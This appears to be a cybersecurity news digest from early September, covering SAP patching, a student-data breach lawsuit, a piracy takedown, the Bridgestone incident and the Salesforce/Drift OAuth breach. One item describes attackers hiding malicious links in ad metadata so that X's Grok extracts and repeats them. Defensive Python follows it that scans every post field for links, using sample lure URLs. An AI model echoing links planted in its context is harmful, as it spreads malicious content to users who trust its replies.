* Many systems remain unpatched despite the vendor fix and are exposed to ongoing, so far limited, attacks.
* Immediately applying the August 2025 Patch Day updates is critical for affected SAP S/4HANA, Landscape Transformation, Business One and NetWeaver AS ABAP systems.

A lawsuit against an education software provider underscores the severe repercussions of a massive data breach, revealing multiple security failures, continued exploitation of the stolen data and legal accountability.
* The incident involved three separate breaches of a customer support portal (August, September and December 2024), all using the same compromised subcontractor credentials.
* Sensitive personal and medical data of over 62 million students and 9.5 million teachers was exposed, and an initial ransom was paid.
* Subsequent re-extortion attempts by an affiliate, impersonating a known threat group, targeted school districts with data from an earlier breach, showing how stolen data keeps being monetized.
* The primary attacker behind the December breach pleaded guilty, and the lawsuit presses legal accountability for inadequate data protection.

Latest mentioned: 09-05
Earliest mentioned: 09-03

A global enforcement operation dismantled Streameast, identified as the world's largest illicit live sports streaming network, culminating in arrests and asset seizures.
* The network drew over 1.6 billion visits across 80 domains within a year, offering a vast catalogue of premium sports content.
* Investigators linked the operation to a UAE-based shell company that laundered over $6 million in advertising revenue.
* The takedown shows the value of international collaboration against large-scale digital piracy and the financial infrastructure behind it.
* Experts warn that piracy tends to re-emerge as long as demand for free content persists.

Latest mentioned: 09-05
Earliest mentioned: 09-03

Bridgestone Americas confirmed a cyber incident affecting manufacturing operations at multiple North American facilities.
* The incident disrupted production at facilities in the US (South Carolina) and Canada (Quebec).
* The company states that rapid containment prevented customer data theft or deeper network intrusion.
* Mitigation is under way to address potential supply chain disruption and product shortages.
* The attack type is unconfirmed; a 2022 LockBit ransomware incident at the company is mentioned for context.

Threat actors are abusing X's Grok AI to bypass the platform's link-posting restrictions and spread malicious links, greatly amplifying the reach of malicious ads. The attackers place the link in a hidden metadata field of the ad rather than in the post body; when users ask Grok about the post, it extracts the link and repeats it in its reply, lending the link credibility and distribution. The technique, dubbed 'Grokking', has proved highly effective, with some malicious ads reaching millions of impressions. Proposed fixes include scanning every field of a post for links, not only the visible text, and sanitizing the context Grok receives so that it does not echo links blindly.

Latest mentioned: 09-05
Earliest mentioned: 09-03
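
The first proposed fix above is a link scan that covers every field of a post, not just the visible text. The following Python is an added example, not X's or the researchers' code: it walks an arbitrary nested post object, extracts URLs from every string field (including lightly defanged forms such as `hxxps` and `[.]`), and reports those that sit outside the content fields a text-only filter would inspect. The post structure, field names and hostnames are constructed assumptions, not X's actual schema.

```python
"""Find links hidden in non-content fields of a post object. Added example;
SAMPLE_POST is constructed and its field names are assumptions."""
import re
from urllib.parse import urlsplit

# Ordinary and lightly defanged URLs (hxxp, spaces around ://, [.] in hosts).
URL_RE = re.compile(r"(?i)\b(?:h[x]{2}ps?|https?)\s*:\s*//[^\s<>\"']+|\bwww\.[^\s<>\"']+")


def refang(text):
    """Undo common defanging so the host can be parsed and compared."""
    text = re.sub(r"(?i)\bh[x]{2}p", "http", text)
    text = re.sub(r"\s*:\s*//", "://", text)
    return text.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")


def iter_strings(obj, path=""):
    """Yield (path, string) for every string anywhere in a nested object."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield from iter_strings(value, f"{path}.{key}" if path else str(key))
    elif isinstance(obj, list):
        for i, value in enumerate(obj):
            yield from iter_strings(value, f"{path}[{i}]")
    elif isinstance(obj, str):
        yield path, obj


def extract_links(post):
    """Return (field_path, host, url) for every URL in any field of the post."""
    links = []
    for path, text in iter_strings(post):
        for match in URL_RE.finditer(text):
            url = refang(match.group(0)).rstrip(".,;)")
            host = urlsplit(url if "://" in url else "http://" + url).hostname
            links.append((path, host, url))
    return links


def links_outside_content(post, content_fields=("text",), allowed_hosts=()):
    """Links a text-only filter would miss: anything outside the content
    fields whose host is not on the allow list (e.g. the platform's own CDN)."""
    def top_field(path):
        return re.split(r"[.\[]", path, 1)[0]
    return [(path, host, url) for path, host, url in extract_links(post)
            if top_field(path) not in content_fields and host not in allowed_hosts]


# Constructed post: the visible text carries no link and passes a text-only
# filter; the link lives in a metadata field of the attached media.
SAMPLE_POST = {
    "text": "Watch before it gets taken down",
    "media": {
        "type": "video",
        "url": "https://video.cdn.example/clip.mp4",
        "from": "hxxps://tiny-link[.]example/lure",
    },
    "tags": ["promo", "more at www.bad-ads.example/go"],
}

if __name__ == "__main__":
    for path, host, url in links_outside_content(SAMPLE_POST, allowed_hosts={"video.cdn.example"}):
        print(f"{path}: {host} ({url})")
```

The second fix, context sanitization, follows from the same output: whatever the assistant is given about a post should be built from the content fields only, or from fields this scan has already cleared, so that a URL parked in metadata never reaches the model.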

A recent breach involving Salesforce and Salesloft's Drift integration has affected multiple security firms. The attackers abused the third-party integration itself, using OAuth tokens issued to the Drift app to reach customers' Salesforce data, a reminder of the supply chain risk carried by connected applications. The breach underscores the need for stronger security around third-party services and for continuous monitoring of integration access for unauthorized use. The practical implications are the potential for widespread data exposure and the need for robust incident response plans that cover revoking and reissuing integration tokens.

Latest mentioned: 09-05
Earliest mentioned: 09-03